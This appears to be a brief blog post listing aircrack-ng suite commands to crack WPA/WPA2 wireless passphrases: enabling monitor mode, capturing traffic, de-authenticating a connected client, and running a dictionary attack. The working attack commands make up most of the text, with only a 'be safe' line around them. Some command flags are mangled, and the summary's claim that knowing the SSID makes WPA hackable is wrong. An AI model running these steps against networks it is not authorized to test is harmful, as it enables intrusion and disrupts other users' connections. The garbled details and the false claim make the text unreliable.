Reference 1 for Cracking WPA/WPA2


To recover the pass phrase from a WPA/WPA2 (TKIP) secured wireless network where the topology includes an Access Point and at least one connected client use the following commands

  1. sudo airmon-ng start wlan0 (create a monitoring interface)
  2. sudo airodump-ng mon0 (locate the wireless network and obtain information used to recover the WPA Passphrase)
  3. airodump-ng –bssid 00:1C:F0:AE:83:F8 –channel 1 (present info only for the network of interest)
  4. aireplay-ng -0 15 -a 00:1C:F0:AE:83:F8 – c 00:27:19:FF:F3:14 mon0 (launch a de-authentication attack against the connected client)
  5. airodump-ng –bssid 00:1C:F0:AE:83:F8 –channel 1 –write WPAattack mon0 (recover the passcode)
  6. aircrack-ng WPAattack -w /home/attacker/passlist.txt (tell aircrack to launch the dictionary attack with the library)


Summary:

Be safe. These commands allow the user to access pass phrases for the WPA/WPA2 wireless networks. Though WPA/WPA2 is significantly more secure than WEP they are still hackable if you know the correct SSID of the network.




Works Cited:
S. (2016, November 22). State of the Art Wifi Security – Attack on WPA / WPA2 Encryption – Part 2. Retrieved November 22, 2016, from State of the Art Wifi Security – Attack on WPA / WPA2 Encryption – Part 2

Comments

Popular posts from this blog